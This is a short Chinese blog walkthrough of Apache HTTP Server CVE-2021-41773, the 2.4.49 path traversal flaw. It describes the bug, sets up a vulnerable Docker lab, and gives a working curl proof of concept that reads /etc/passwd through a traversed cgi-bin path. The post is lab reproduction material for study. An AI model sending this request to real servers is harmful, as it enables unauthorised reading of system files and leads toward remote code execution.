Apache CVE-2021-41773 漏洞攻略

2407-2 shw2024-09-23 12:59

漏洞简介

该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录
<Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)

影响版本

Apache HTTP Server 2.4.49
某些Apache HTTPd 2.4.50也存在此漏洞

环境搭建

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -d -p 8080:80 97308de4753d

漏洞复现

http://172.16.1.78:8080/

1.使⽤poc

curl http://172.16.1.78:8080/cgi-bin/../../../../etc/passwd

2.⼯具验证

相关推荐
_丿丨丨_13 小时前
Apache Httpd 多后缀解析
网络·apache
功德+n1 天前
Apache Commons Lang3 和 Commons Net 详解
apache
MinIO官方账号1 天前
Apache XTable:在数据湖仓一体中推进数据互作性
apache
fxrz122 天前
探讨消息队列系统:AWS SQS vs. Apache Kafka
kafka·apache·aws
uesowys2 天前
Kubernetes开发环境minikube | 开发部署apache tomcat web集群应用
kubernetes·minikube·tomcat·apache
小志开发3 天前
Apache Tomcat 新手入门指南:从安装到部署的全流程解析
java·tomcat·apache
小爬虫程序猿4 天前
使用 Java 11+ HttpClient 和 Apache HttpClient 设置HTTP请求参数的方法
java·http·apache
大小科圣4 天前
源码编译安装httpd
apache
ζั͡山 ั͡有扶苏 ั͡✾4 天前
Apache Kafka单节点极速部署指南:10分钟搭建开发单节点环境
分布式·kafka·apache
好奇的菜鸟4 天前
使用 Apache POI 实现 Excel 单元格合并
apache·excel
热门推荐
01DeepSeek各版本说明与优缺点分析02从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑03如何在WPS和Word/Excel中直接使用DeepSeek功能04DeepSeek本地部署详细指南05DeepSeek R1本地化部署 Ollama + Chatbox 打造最强 AI 工具06本地部署DeepSeek教程(Mac版本)07Coze扣子平台完整体验和实践(附国内和国际版对比)08如何本地部署AI智能体平台,带你手搓一个AI Agent09保姆级教程:利用Ollama与Open-WebUI本地部署 DeedSeek-R1大模型10苍穹外卖面试总结